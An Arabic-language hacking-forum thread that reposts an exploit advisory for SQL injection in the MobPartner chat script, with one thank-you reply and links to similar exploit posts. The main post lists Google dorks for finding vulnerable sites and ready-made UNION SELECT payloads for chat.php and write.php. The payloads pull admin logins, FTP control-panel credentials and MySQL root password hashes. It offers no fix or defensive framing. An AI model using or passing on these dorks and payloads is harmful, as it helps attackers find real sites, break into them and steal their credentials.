MobPartner Chat Multiple Sql Injection Vulnerability

MobPartner Chat Multiple Sql Injection Vulnerability


النتائج 1 إلى 2 من 2

الموضوع: MobPartner Chat Multiple Sql Injection Vulnerability

  1. #1

    افتراضي MobPartner Chat Multiple Sql Injection Vulnerability

    MobPartner Chat Multiple Sql Injection Vulnerabilities

    كود:
    ####################################################################
    .:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
    .:. Team           : Sec Attack Team
    .:. Home           : www.sec-attack.com/vb
    .:. Script         : MobPartner
    .:. Download Script: http://www.mobpartner.com/services/chat/?wsid=32174
    .:. Bug Type       : Sql Injection [Mysql]
    .:. Dork           : [1]"Powered by MobPartner" inurl:"chat.php"
                           [2]"Powered by MobPartner" inurl:"write.php"
    ####################################################################
     
    ===[ Exploit ]===
     
    www.site.com/chat.php?id=[SQL INJECTION]
    www.site.com/write.php?id=[SQL INJECTION]
     
    ********************************************************************
     T0 Get Username & Password Admin Site
     
    [Sql Injection ; {Username & password Admin}]
     
    www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--
    www.site.com/write.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--
     
     
    ********************************************************************
     T0 Get Username & Password FTP Control Panel
     
    [Sql Injection ; {Username & Password FTP Control Panel}]
     
    www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--
    www.site.com/write.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--
     
     
    ********************************************************************
     T0 Get Username & Password Root Server
     
    [Sql Injection ; {Username & Password Root Server}]
     
    www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--
    www.site.com/write.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--
     
    ####################################################################
     
    Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack

  2. #2

    افتراضي رد: MobPartner Chat Multiple Sql Injection Vulnerability

    جزاك الله خيرا

المواضيع المتشابهه

  1. ShoutCMS (content.php) Blind Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-02-2010, 02:47 PM
  2. crownweb (page.cfm) Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-02-2010, 02:44 PM
  3. Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 02-02-2010, 12:05 AM
  4. ThinkAdmin (page.php) Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 02-01-2010, 03:03 AM
  5. joomla component com_simplefaq (catid) Blind SQL Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 01-31-2010, 01:50 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •